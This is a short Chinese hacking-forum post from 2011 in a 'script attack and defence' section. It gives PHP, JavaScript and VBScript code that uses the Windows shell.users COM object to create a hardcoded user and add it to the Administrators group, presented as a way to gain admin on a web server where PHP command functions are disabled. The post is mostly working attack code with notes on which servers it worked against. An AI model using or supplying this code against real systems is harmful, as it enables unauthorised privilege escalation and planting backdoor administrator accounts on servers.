服务器 > 网络安全 > 脚本攻防

php版shell.users加管理员帐号的方法

40人参与 2011-06-15 脚本攻防

当 php执行命令的函数如exec,system,shell_exec,proc_open,passthru,popen

以及wscript.shell 组建被禁用的情况下,这也许是一个机会。

代码如下:

复制代码
代码如下:

<?php
echo "<div align=center><b>php 版shell.users加管理员帐号</b></div>";
$username="iceskin";
$password="skin.com";
$su = new com("shell.users");
$h=$su->create($username);
$h->changepassword($password,"");
$h->setting["accounttype"] = 3;//这句很重要可以把用户加入administrators 组,
?>

对apache 搭建的web 服务器可以执行成功,iis 好像权限不够,nginx 和lighttpd 搭建的web 服务器还没有测试。

下面是 lcx 的代码

js:
var o=new activexobject( "shell.users" );
z=o.create("test") ;
z.changepassword("123456","")
z.setting("accounttype")=3;


vbs:
set o=createobject( "shell.users" )
set z=o.create("test")
z.changepassword "123456",""
z.setting("accounttype")=3

hi.baidu.com/南拳daddy
(0)
打赏 微信扫一扫 微信扫一扫

您想发表意见!!点此发布评论

推荐阅读

讯时系统(xuas)最新通杀漏洞0day图文说明

07-15

网站后台脚本漏洞挖掘技巧,基于工具快速挖掘

05-15

讯时漏洞一小结

07-15

Phpcms本地包含漏洞导致的写shell漏洞和删除任意文件漏洞

05-10

DedeCms V5.6漏洞 变量未初始化 导致鸡助漏洞

08-19

ewebeditor 上传遇到防火墙限制的解决办法 图文

05-10

猜你喜欢

版权声明:本文内容由互联网用户贡献,该文观点仅代表作者本人。本站仅提供信息存储服务,不拥有所有权,不承担相关法律责任。 如发现本站有涉嫌抄袭侵权/违法违规的内容, 请发送邮件至 2386932994@qq.com 举报,一经查实将立刻删除。

发表评论